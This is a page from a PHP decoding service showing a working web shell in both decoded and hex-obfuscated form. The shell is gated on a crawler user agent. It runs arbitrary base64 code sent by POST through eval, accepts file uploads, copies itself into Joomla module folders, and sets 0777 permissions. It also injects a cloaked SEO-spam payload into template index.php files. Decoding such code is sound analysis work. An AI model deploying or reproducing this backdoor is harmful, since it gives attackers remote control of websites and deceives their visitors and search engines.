Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
header('Content-Type: text/html; charset=utf-8'); $f = 0777; $c = $_GET; $d = $_POST; $e =..
Decoded Output download
<? header('Content-Type: text/html; charset=utf-8'); $f = 0777; $c = $_GET; $d = $_POST; $e = $_SERVER; $b0 = "HTTP_USER_AGENT"; $b1 = "Yahoo! Slurp"; $b2 = "feeduid"; $a0 = ".php"; $a1 = "index".$a0; $a2 = "PHP_SELF"; $a3 = "SCRIPT_NAME"; $n0 = end(explode("/",$e[$a3])); if(isset($c[$b2]) and stristr($e[$b0],$b1)){ function str_lreplace($search, $replace, $subject){$pos=strrpos($subject,$search);if($pos!==false){$subject=substr_replace($subject,$replace,$pos,strlen($search));}return $subject;} function writefile($filename,$data,$file_append=false){$fp=fopen($filename,(!$file_append ? 'w+' : 'a+')); if(!$fp){ echo 'wrerr'; return false;} return fputs($fp, $data); fclose($fp); } function ls($root="./"){if(file_exists($root)){if(substr($root,-1,1)!="/"){ $root .= "/"; }$files = scandir($root);$_file = null;$_directory = null;if(count($files) > 2){foreach($files as $file){if(file_exists($root . $file) and $file != '.' and $file != '..' and is_dir($root . $file)){$_directory[] = $file;}elseif(file_exists($root . $file) and $file != '.' and $file != '..' and !is_dir($file)){$_file[] = $file;}}}return array("fo" => $_directory, "fi" => $_file);}else{return false;}} if(isset($c["rn"])){ @rename(@end(@explode("/",$e[$a2])),(@trim($c["rn"])).$a0); } if(isset($d["inf"]) or isset($_GET["inf"])){ echo "{*casper*}"; } if(!empty($d["rnnr"])){ @eval(base64_decode($d["rnnr"])); } if(isset($d["cpy"])){ if(@copy($n0,"../../cache/mod_footer/".$n0)){$arry[]="../../cache/mod_footer/".$n0;} if(@copy($n0,"../mod_search/".$n0)){$arry[]="../mod_search/".$n0;} if(@copy($n0,"../mod_login/".$n0)){$arry[]="../mod_login/".$n0;} if(@copy($n0,"../mod_whosonline/".$n0)){$arry[]="../mod_whosonline/".$n0;} if(@copy($n0,"../mod_articles_latest/".$n0)){$arry[]="../mod_articles_latest/".$n0;} if(@copy($n0,"../mod_syndicate/".$n0)){$arry[]="../mod_syndicate/".$n0;} if(@copy($n0,"../mod_stats/".$n0)){$arry[]="../mod_stats/".$n0;} echo '{"copied":"'.count($arry).'"}'; die(); } if($d["_upl"]=="Upload"){ @chmod(@str_replace(@end(@explode("/",$e[$a2])),'',$e[$a2]),$f); if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo '{success:success}'; } else { echo "{fail:fail}"; } die(); } if(isset($d["stup"])){ @chmod(@str_replace(@end(@explode("/",$e[$a2])),'',$e[$a2]),$f); $dr = "../../templates/"; if(@is_dir($dr)==false){$dr="../templates/";} if(@is_dir($dr)==false){$dr="../../../templates/";} if(@is_dir($dr)==false){$dr="../../../../templates/";} if(@is_dir($dr)==false){$dr="../../../../../templates/";} if(@is_dir($dr)==false){$dr="../../../../../../templates/";} if(@is_dir($dr)==false){$dr="../../../../../../../templates/";} $ls=ls($dr); $stp=false; if(count($ls["fo"])>0){ foreach($ls["fo"] as $dir){ $_dir = $dr.$dir."/"; @chmod($_dir,$f); @chmod($_dir.$a1,$f); $content=file_get_contents($_dir.$a1); $prepend=" "; for($i=0;$i<=1000;$i++){ $prepend .= " "; } if(stristr($content,"R29vZ2xlYm90LU1vYmlsZS8yLjE=")){ $fclnr = explode("/*.~.~.~.*/",$content); $content = str_replace(array("<?php /*.~.~.~.*/",$prepend,$fclnr[1],"/*.~.~.~.*/ ?>
","/*.~.~.~.*/ ?>"),"",$content); $content = str_replace($prepend,"",$content); } if(!stristr($content,"R29vZ2xlYm90LU1vYmlsZS8yLjE=")){ if(@stristr($content,"</body>")!==false){$tag="</body>";}elseif(@stristr($content,"</div>")!==false){$tag="</div>";} $content = str_lreplace($tag,$prepend."<?php /*.~.~.~.*/ \$__BLCN=\"".urldecode($d["updtfle"])."\";".base64_decode("ICRfeDAgPSBhcnJheSgiUjI5dloyeGxZbTkwTFUxdlltbHNaUzh5TGpFPSIsIlIyOXZaMnhsWW05MEx6SXVNUT09IiwiYlhOdVltOTBMVzFsWkdsaEx6RXVNUT09IiwiVFZOT1FtOTBMekl1TUdJPSIsIlRWTk9RbTkwTHpFdU1RPT0iLCJUVk5PUW05MEx6RXVNQT09IiwiWW1sdVoySnZkQzh5TGpBPSIsIldXRnVaR1Y0UW05MEx6TXVNQT09IiwiV1dGdVpHVjRRbTkwTHpNdU1DMU5hWEp5YjNKRVpYUmxZM1J2Y2c9PSIsIldXRnVaR1Y0UkdseVpXTjBMek11TUE9PSIsIldXRnVaR1Y0THpFdU1ERXVNREF4IiwiV1dGb2IyOGhJRk5zZFhKdyIsIldXRm9iMjh0VFUxRGNtRjNiR1Z5THpRdU1BPT0iLCJXV0ZvYjI4aElGTnNkWEp3THpNdU1BPT0iLCJRWE5ySUVwbFpYWmxjeTlVWlc5dFlRPT0iKTsgJF9feGEgPSAkX1NFUlZFUlsiXHg0OFx4NTRceDU0XHg1MFx4NWZceDU1XHg1M1x4NDVceDUyXHg1Zlx4NDFceDQ3XHg0NVx4NGVceDU0Il07IGlmKCFlbXB0eSgkX194YSkgYW5kICFlbXB0eSgkX3gwKSkgeyBmb3JlYWNoKCRfeDAgYXMgJF94MSkgeyAkX3gxID0gYmFzZTY0X2RlY29kZSgkX3gxKTsgaWYoQHN0cmlzdHIoJF9feGEsJF94MSkpIHsgLyp4Ki8kX19CTENOVD1iYXNlNjRfZGVjb2RlKCRfX0JMQ04pOy8qeCovIGVjaG8gJF9fQkxDTlQ7IH0gfSB9")."/*.~.~.~.*/ ?>
".$tag,$content); writefile($_dir.$a1,$content); $stp=true; } } if($stp){ echo "STP1"; }}}}?>
Did this file decode correctly?
Original Code
header('Content-Type: text/html; charset=utf-8'); $f = 0777; $c = $_GET; $d = $_POST; $e = $_SERVER; $b0 = "\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"; $b1 = "\x59\x61\x68\x6f\x6f\x21\x20\x53\x6c\x75\x72\x70"; $b2 = "\x66\x65\x65\x64\x75\x69\x64"; $a0 = "\x2e\x70\x68\x70"; $a1 = "\x69\x6e\x64\x65\x78".$a0; $a2 = "\x50\x48\x50\x5f\x53\x45\x4c\x46"; $a3 = "\x53\x43\x52\x49\x50\x54\x5f\x4e\x41\x4d\x45"; $n0 = end(explode("\x2f",$e[$a3])); if(isset($c[$b2]) and stristr($e[$b0],$b1)){ function str_lreplace($search, $replace, $subject){$pos=strrpos($subject,$search);if($pos!==false){$subject=substr_replace($subject,$replace,$pos,strlen($search));}return $subject;} function writefile($filename,$data,$file_append=false){$fp=fopen($filename,(!$file_append ? 'w+' : 'a+')); if(!$fp){ echo 'wrerr'; return false;} return fputs($fp, $data); fclose($fp); } function ls($root="\x2e\x2f"){if(file_exists($root)){if(substr($root,-1,1)!="\x2f"){ $root .= "\x2f"; }$files = scandir($root);$_file = null;$_directory = null;if(count($files) > 2){foreach($files as $file){if(file_exists($root . $file) and $file != '.' and $file != '..' and is_dir($root . $file)){$_directory[] = $file;}elseif(file_exists($root . $file) and $file != '.' and $file != '..' and !is_dir($file)){$_file[] = $file;}}}return array("\x66\x6f" => $_directory, "\x66\x69" => $_file);}else{return false;}} if(isset($c["\x72\x6e"])){ @rename(@end(@explode("\x2f",$e[$a2])),(@trim($c["\x72\x6e"])).$a0); } if(isset($d["\x69\x6e\x66"]) or isset($_GET["\x69\x6e\x66"])){ echo "\x7b\x2a\x63\x61\x73\x70\x65\x72\x2a\x7d"; } if(!empty($d["\x72\x6e\x6e\x72"])){ @eval(base64_decode($d["\x72\x6e\x6e\x72"])); } if(isset($d["\x63\x70\x79"])){ if(@copy($n0,"\x2e\x2e\x2f\x2e\x2e\x2f\x63\x61\x63\x68\x65\x2f\x6d\x6f\x64\x5f\x66\x6f\x6f\x74\x65\x72\x2f".$n0)){$arry[]="\x2e\x2e\x2f\x2e\x2e\x2f\x63\x61\x63\x68\x65\x2f\x6d\x6f\x64\x5f\x66\x6f\x6f\x74\x65\x72\x2f".$n0;} if(@copy($n0,"\x2e\x2e\x2f\x6d\x6f\x64\x5f\x73\x65\x61\x72\x63\x68\x2f".$n0)){$arry[]="\x2e\x2e\x2f\x6d\x6f\x64\x5f\x73\x65\x61\x72\x63\x68\x2f".$n0;} if(@copy($n0,"\x2e\x2e\x2f\x6d\x6f\x64\x5f\x6c\x6f\x67\x69\x6e\x2f".$n0)){$arry[]="\x2e\x2e\x2f\x6d\x6f\x64\x5f\x6c\x6f\x67\x69\x6e\x2f".$n0;} if(@copy($n0,"\x2e\x2e\x2f\x6d\x6f\x64\x5f\x77\x68\x6f\x73\x6f\x6e\x6c\x69\x6e\x65\x2f".$n0)){$arry[]="\x2e\x2e\x2f\x6d\x6f\x64\x5f\x77\x68\x6f\x73\x6f\x6e\x6c\x69\x6e\x65\x2f".$n0;} if(@copy($n0,"\x2e\x2e\x2f\x6d\x6f\x64\x5f\x61\x72\x74\x69\x63\x6c\x65\x73\x5f\x6c\x61\x74\x65\x73\x74\x2f".$n0)){$arry[]="\x2e\x2e\x2f\x6d\x6f\x64\x5f\x61\x72\x74\x69\x63\x6c\x65\x73\x5f\x6c\x61\x74\x65\x73\x74\x2f".$n0;} if(@copy($n0,"\x2e\x2e\x2f\x6d\x6f\x64\x5f\x73\x79\x6e\x64\x69\x63\x61\x74\x65\x2f".$n0)){$arry[]="\x2e\x2e\x2f\x6d\x6f\x64\x5f\x73\x79\x6e\x64\x69\x63\x61\x74\x65\x2f".$n0;} if(@copy($n0,"\x2e\x2e\x2f\x6d\x6f\x64\x5f\x73\x74\x61\x74\x73\x2f".$n0)){$arry[]="\x2e\x2e\x2f\x6d\x6f\x64\x5f\x73\x74\x61\x74\x73\x2f".$n0;} echo '{"copied":"'.count($arry).'"}'; die(); } if($d["\x5f\x75\x70\x6c"]=="\x55\x70\x6c\x6f\x61\x64"){ @chmod(@str_replace(@end(@explode("\x2f",$e[$a2])),'',$e[$a2]),$f); if(@copy($_FILES["\x66\x69\x6c\x65"]["\x74\x6d\x70\x5f\x6e\x61\x6d\x65"], $_FILES["\x66\x69\x6c\x65"]["\x6e\x61\x6d\x65"])) { echo '{success:success}'; } else { echo "\x7b\x66\x61\x69\x6c\x3a\x66\x61\x69\x6c\x7d"; } die(); } if(isset($d["\x73\x74\x75\x70"])){ @chmod(@str_replace(@end(@explode("\x2f",$e[$a2])),'',$e[$a2]),$f); $dr = "\x2e\x2e\x2f\x2e\x2e\x2f\x74\x65\x6d\x70\x6c\x61\x74\x65\x73\x2f"; if(@is_dir($dr)==false){$dr="\x2e\x2e\x2f\x74\x65\x6d\x70\x6c\x61\x74\x65\x73\x2f";} if(@is_dir($dr)==false){$dr="\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x74\x65\x6d\x70\x6c\x61\x74\x65\x73\x2f";} if(@is_dir($dr)==false){$dr="\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x74\x65\x6d\x70\x6c\x61\x74\x65\x73\x2f";} if(@is_dir($dr)==false){$dr="\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x74\x65\x6d\x70\x6c\x61\x74\x65\x73\x2f";} if(@is_dir($dr)==false){$dr="\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x74\x65\x6d\x70\x6c\x61\x74\x65\x73\x2f";} if(@is_dir($dr)==false){$dr="\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x74\x65\x6d\x70\x6c\x61\x74\x65\x73\x2f";} $ls=ls($dr); $stp=false; if(count($ls["\x66\x6f"])>0){ foreach($ls["\x66\x6f"] as $dir){ $_dir = $dr.$dir."/"; @chmod($_dir,$f); @chmod($_dir.$a1,$f); $content=file_get_contents($_dir.$a1); $prepend=" "; for($i=0;$i<=1000;$i++){ $prepend .= " "; } if(stristr($content,"R29vZ2xlYm90LU1vYmlsZS8yLjE=")){ $fclnr = explode("\x2f\x2a\x2e\x7e\x2e\x7e\x2e\x7e\x2e\x2a\x2f",$content); $content = str_replace(array("\x3c\x3f\x70\x68\x70\x20\x2f\x2a\x2e\x7e\x2e\x7e\x2e\x7e\x2e\x2a\x2f",$prepend,$fclnr[1],"\x2f\x2a\x2e\x7e\x2e\x7e\x2e\x7e\x2e\x2a\x2f\x20\x3f\x3e\n\r","\x2f\x2a\x2e\x7e\x2e\x7e\x2e\x7e\x2e\x2a\x2f\x20\x3f\x3e"),"",$content); $content = str_replace($prepend,"",$content); } if(!stristr($content,"R29vZ2xlYm90LU1vYmlsZS8yLjE=")){ if(@stristr($content,"\x3c\x2f\x62\x6f\x64\x79\x3e")!==false){$tag="\x3c\x2f\x62\x6f\x64\x79\x3e";}elseif(@stristr($content,"\x3c\x2f\x64\x69\x76\x3e")!==false){$tag="\x3c\x2f\x64\x69\x76\x3e";} $content = str_lreplace($tag,$prepend."\x3c\x3f\x70\x68\x70\x20\x2f\x2a\x2e\x7e\x2e\x7e\x2e\x7e\x2e\x2a\x2f \$__BLCN=\"".urldecode($d["updtfle"])."\";".base64_decode("ICRfeDAgPSBhcnJheSgiUjI5dloyeGxZbTkwTFUxdlltbHNaUzh5TGpFPSIsIlIyOXZaMnhsWW05MEx6SXVNUT09IiwiYlhOdVltOTBMVzFsWkdsaEx6RXVNUT09IiwiVFZOT1FtOTBMekl1TUdJPSIsIlRWTk9RbTkwTHpFdU1RPT0iLCJUVk5PUW05MEx6RXVNQT09IiwiWW1sdVoySnZkQzh5TGpBPSIsIldXRnVaR1Y0UW05MEx6TXVNQT09IiwiV1dGdVpHVjRRbTkwTHpNdU1DMU5hWEp5YjNKRVpYUmxZM1J2Y2c9PSIsIldXRnVaR1Y0UkdseVpXTjBMek11TUE9PSIsIldXRnVaR1Y0THpFdU1ERXVNREF4IiwiV1dGb2IyOGhJRk5zZFhKdyIsIldXRm9iMjh0VFUxRGNtRjNiR1Z5THpRdU1BPT0iLCJXV0ZvYjI4aElGTnNkWEp3THpNdU1BPT0iLCJRWE5ySUVwbFpYWmxjeTlVWlc5dFlRPT0iKTsgJF9feGEgPSAkX1NFUlZFUlsiXHg0OFx4NTRceDU0XHg1MFx4NWZceDU1XHg1M1x4NDVceDUyXHg1Zlx4NDFceDQ3XHg0NVx4NGVceDU0Il07IGlmKCFlbXB0eSgkX194YSkgYW5kICFlbXB0eSgkX3gwKSkgeyBmb3JlYWNoKCRfeDAgYXMgJF94MSkgeyAkX3gxID0gYmFzZTY0X2RlY29kZSgkX3gxKTsgaWYoQHN0cmlzdHIoJF9feGEsJF94MSkpIHsgLyp4Ki8kX19CTENOVD1iYXNlNjRfZGVjb2RlKCRfX0JMQ04pOy8qeCovIGVjaG8gJF9fQkxDTlQ7IH0gfSB9")."\x2f\x2a\x2e\x7e\x2e\x7e\x2e\x7e\x2e\x2a\x2f\x20\x3f\x3e\n\r".$tag,$content); writefile($_dir.$a1,$content); $stp=true; } } if($stp){ echo "STP1"; }}}}?>
Function Calls
header | 1 |
Stats
MD5 | 926aba196a6d755b662b9ac1f5d86463 |
Eval Count | 0 |
Decode Time | 192 ms |